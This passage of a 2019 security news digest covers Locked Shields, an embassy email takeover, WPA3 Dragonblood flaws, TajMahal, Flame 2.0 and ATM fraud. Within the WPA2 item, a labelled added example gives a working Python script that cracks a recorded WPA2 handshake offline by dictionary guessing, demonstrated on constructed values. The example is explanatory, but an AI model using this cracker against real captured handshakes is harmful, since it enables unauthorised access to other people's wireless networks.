purification systems, the power grid, 4G public safety networks and other
essential services. Civil unrest spreads as the attacks twist the public
perception of election results. The drill, dubbed Locked Shields 2019, is
billed as a “live-fire” event, which means all actions by six teams of
competing network defenders will have immediate effects in the game-like
environment.
CSO, April 8, 2019
An attacker claiming to be ISIS took control of the official email
account of the Saudi Embassy in the Netherlands in August, 2014 and sent emails
to more than a dozen embassies at The Hague demanding $50 million for ISIS, or
they would blow up a major diplomatic reception, documents seen by CSO reveal.
The attack compromised the Saudi embassy's non-classified computer network. The attackers
deployed a garden-variety rootkit on the workstation of the ambassador’s
secretary and took over the embassy's official email account. No one was ever
formally held accountable, despite an internal investigation. Given the low
sophistication of the attack, experts tell CSO it's impossible to say whether
the attacker really was part of an organized effort by ISIS, a random
supporter, or a nation-state intelligence agency masquerading as ISIS for
motives unknown.
TECHNOLOGY
Ars Technica
April 11,
2019
The
next-generation Wi-Fi Protected Access protocol released 15 months ago was once
hailed by key architects as resistant to most types of password-theft attacks
that threatened its predecessors. On Wednesday, researchers disclosed several
serious design flaws in WPA3 that shattered that myth and raised troubling new
questions about the future of wireless security, particularly among low-cost
Internet-of-things devices. While a big improvement over the earlier and
notoriously weak Wired Equivalent Privacy and the original WPA, the current
WPA2 version (in use since the mid-2000s) has suffered a crippling design weakness
that has been known for more than a decade: the four-way handshake, the
cryptographic exchange WPA2 uses to authenticate computers, phones, and tablets to
an access point and vice versa, is keyed by a value derived directly from the
network passphrase (the pairwise master key, a PBKDF2 hash of the passphrase and
the SSID), and its messages carry an integrity code computed under that key. Anyone
within radio range of a device joining the network can record this handshake and
then guess passphrases offline: each guess is hashed, expanded into a session key
using the nonces and addresses that were sent in the clear, and checked against the
recorded integrity code, with no further contact with the access point. Short
passphrases or those that aren’t random are then trivial to crack in a matter of
seconds. One of WPA3’s most promoted changes was its use of “Dragonfly” (the
Simultaneous Authentication of Equals, or SAE, handshake), a completely overhauled
exchange that its architects once said was resistant to the offline password-guessing
attacks that threatened WPA2 users. A research paper titled Dragonblood: A Security
Analysis of WPA3’s SAE Handshake disclosed several vulnerabilities in WPA3 that open
users to many of the same attacks that threatened WPA2 users, among them a downgrade
to the WPA2 handshake against networks running in WPA3 transition mode and timing and
cache side channels in Dragonfly’s password-to-element conversion that leak enough to
drive an offline dictionary attack. Until firmware is patched, the practical defences
are the same as for WPA2: a long, random passphrase, and avoiding transition mode
where clients allow it.
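The offline attack on the WPA2 handshake described above, as an added example (this is not code from the Ars Technica article or the Dragonblood paper). The key-derivation steps are the ones IEEE 802.11i specifies for WPA2-PSK with CCMP: PBKDF2 for the pairwise master key, the 802.11 PRF for the pairwise transient key, and HMAC-SHA1-128 for the EAPOL MIC. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed for the demo; message 2 is built with an empty Key Data field rather than the RSN element a real client sends, which does not change how the MIC is checked.

```python
"""Offline dictionary attack against a recorded WPA2 four-way handshake.

Added example. All addresses, nonces and the passphrase are constructed;
this is not a real capture.
"""
import hashlib
import hmac

PRF_LABEL = b"Pairwise key expansion"
MIC_LEN = 16
EAPOL_MIC_OFFSET = 4 + 77  # 4-byte EAPOL header + offset of Key MIC in the EAPOL-Key descriptor


def wpa2_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the only step that involves the passphrase; everything else is
    derivable from it plus values the handshake sends in the clear."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, length: int = 48) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(AA, SPA) || min/max(ANonce, SNonce)).
    The first 16 bytes are the KCK, the key that authenticates the EAPOL messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 descriptor version 2: MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[EAPOL_MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes, replay_counter: int = 1, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP). Key Data (RSN IE) omitted for brevity."""
    body = (bytes([2])                          # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")       # key info: version 2 (HMAC-SHA1), pairwise, MIC bit set
            + (0).to_bytes(2, "big")            # key length
            + replay_counter.to_bytes(8, "big")
            + snonce                            # the client's nonce, sent in the clear
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
            + mic
            + (0).to_bytes(2, "big"))           # key data length
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = EAPOL-Key


def crack_handshake(ssid, aa, spa, anonce, snonce, eapol_msg2, wordlist):
    """Replay the client's own derivation for each candidate passphrase and return
    the one whose KCK reproduces the MIC recorded in message 2, or None."""
    captured_mic = eapol_msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        kck = wpa2_ptk(wpa2_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if eapol_mic(kck, eapol_msg2) == captured_mic:
            return candidate
    return None


def demo():
    # Victim side (constructed): everything here is visible to a listener in radio range
    # except the passphrase, which only influences the MIC.
    ssid = b"CoffeeShop"
    aa = bytes.fromhex("020000000001")   # AP MAC, made up (locally administered)
    spa = bytes.fromhex("020000000002")  # client MAC, made up
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    secret = "sunflower1"                # weak passphrase the AP uses (constructed)

    kck = wpa2_ptk(wpa2_pmk(secret, ssid), aa, spa, anonce, snonce)[:16]
    unsigned = build_eapol_msg2(snonce)
    msg2 = build_eapol_msg2(snonce, mic=eapol_mic(kck, unsigned))

    # Attacker side: offline guessing against the recorded values, no traffic to the AP.
    wordlist = ["password", "letmein", "coffeeshop", "sunflower1", "Tr0ub4dor&3"]
    return crack_handshake(ssid, aa, spa, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each guess costs one PBKDF2 run of 4096 SHA-1 iterations plus a few HMACs, which is why a dictionary of common passphrases falls in seconds on a GPU while a long random passphrase does not: the cost scales with the attacker's guess count, not with any interaction with the network.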
Wired
April 9,
2019
It's not
every day that security researchers discover a new state-sponsored hacking
group. Even rarer is the emergence of one whose spyware has 80 distinct
components, capable of strange and unique cyberespionage tricks—and who's kept
those tricks under wraps for more than five years. In a talk at the Kaspersky
Security Analyst Summit in Singapore Wednesday, Kaspersky security researcher
Alexey Shulmin revealed the security firm's discovery of a new spyware
framework—an adaptable, modular piece of software with a range of plugins for
distinct espionage tasks—that it's calling TajMahal. The TajMahal framework's
80 modules, Shulmin says, comprise not only the typical keylogging and
screengrabbing features of spyware, but also never-before-seen and obscure
tricks. It can intercept documents in a printer queue, and keep track of
"files of interest," automatically stealing them if a USB drive is
inserted into the infected machine. And that unique spyware toolkit, Kaspersky
says, bears none of the fingerprints of any known nation-state hacker group.
CyberScoop
April 9,
2019
Flame, the
nation-state-developed malware kit that targeted computers in Iran, went quiet
after researchers exposed it in 2012. The attackers tried to hide their tracks
by scrubbing servers used to talk to infected computers. Some thought they had
seen the last of the potent malware platform. Flame’s disappearance “never sat
right with us,” said Juan Andres Guerrero-Saade and Silas Cutler, researchers
with Alphabet’s Chronicle. On Tuesday at the Kaspersky Security Analyst Summit
in Singapore, they showed that Flame hadn’t died, it had just been
reconfigured. Tracing early components of Flame, Guerrero-Saade and Cutler
found a new version of it that was likely used between 2014 and 2016. Flame 2.0
is “clearly built” from the original source code, but it has new measures aimed
at eluding researchers, they wrote in a paper. The discovery shows how good
source code dies hard, and that tracking its evolution can be a very long game
for researchers.
Wired
April 9,
2019
Over the
past few years, scammers have increasingly siphoned cash off of digital payment
networks, stealing hundreds of millions of dollars so far. Not only is the problem
hard to contain; new findings show that it's evolving and maturing, with new
types of ATM malware on the rise. Researchers at the Kaspersky Security Analyst
Summit in Singapore are presenting findings on Wednesday about a new wave of
payment system scams. Beyond so-called jackpotting attacks, which cause
individual ATMs to spit out money, hackers are manipulating ATM networks and
the digital authentication checks in the machines to cash out fraudulent
transfers they initiate around the globe. Hackers have hit a variety of
financial platforms—including Mexico's domestic money transfer system SPEI—in
payment systems frauds in recent years. But the majority of the scams target
the international payment network SWIFT, which transfers trillions of dollars per
day. Numerous notorious digital bank heists, like a whopping $81 million stolen
in Bangladesh in 2016 and $10 million stolen in Chile last year, have shown how
vulnerable digital payment networks can be. But attackers are now using the
same types of transaction manipulations in unexpected places, like ATM
networks, to get around new defenses while still using the same types of
strategies that have already raked in a steady stream of cash.